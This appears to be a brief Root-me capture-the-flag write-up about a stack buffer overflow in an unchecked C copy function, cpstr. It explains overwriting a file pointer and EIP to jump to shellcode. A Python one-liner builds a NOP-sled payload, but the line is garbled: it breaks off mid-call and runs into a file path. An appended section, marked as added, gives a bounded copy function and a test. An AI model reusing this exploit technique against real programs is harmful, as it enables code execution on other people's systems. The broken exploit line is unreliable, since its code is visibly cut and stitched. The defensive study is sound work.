Root-me
void cpstr(char *dst, const char *src) /* the vulnerable function */
{
    /* Copies until the NUL terminator in src; the size of dst is never checked. */
    for (; *src; src++, dst++)
    {
        *dst = *src;
    }
    *dst = 0;
}
OK, this is clearly a simple buffer overflow. The only problem was that while overwriting the stack we also overwrite the file pointer, which causes a little problem, so we
have to restore it and then overwrite EIP with our shellcode address, which is loaded via C code as seen in the format bug 3 question, and that's it!
python -c 'import struct;print "USERNAME="+"\x90"*136+struct.pack(" /tmp/siva/imp
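
The overflow exists because cpstr copies until the source's NUL byte and never learns the size of the destination. As an added example (not part of the original write-up or the challenge source), here is a bounded variant; `cpstr_bounded`, `struct frame` and its 32-byte buffer are hypothetical names and sizes chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Bounded variant of cpstr (added example, not the challenge's code).
 * Copies at most dstsize-1 bytes and always NUL-terminates.
 * Returns 0 if src fit completely, -1 if it was truncated or args are bad. */
int cpstr_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t i;

    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    for (i = 0; i + 1 < dstsize && src[i] != '\0'; i++)
        dst[i] = src[i];
    dst[i] = '\0';
    return src[i] == '\0' ? 0 : -1;
}

/* Hypothetical layout standing in for the challenge's stack frame:
 * a name buffer followed by the data the write-up says gets clobbered. */
struct frame {
    char  name[32];
    void *file_ptr;   /* stands in for the FILE pointer */
};

/* Copies an oversized, constructed input and reports whether the
 * neighbouring pointer survived: 1 = intact, 0 = overwritten. */
int neighbour_survives_oversized_copy(void)
{
    struct frame f;
    char input[200];
    void *sentinel = (void *)&f;

    memset(input, 'A', sizeof input - 1);
    input[sizeof input - 1] = '\0';
    f.file_ptr = sentinel;

    if (cpstr_bounded(f.name, sizeof f.name, input) != -1)
        return 0;                       /* truncation must be reported */
    return f.file_ptr == sentinel && strlen(f.name) == sizeof f.name - 1;
}
```

Callers should treat the -1 return as a rejected input rather than continuing with the truncated string.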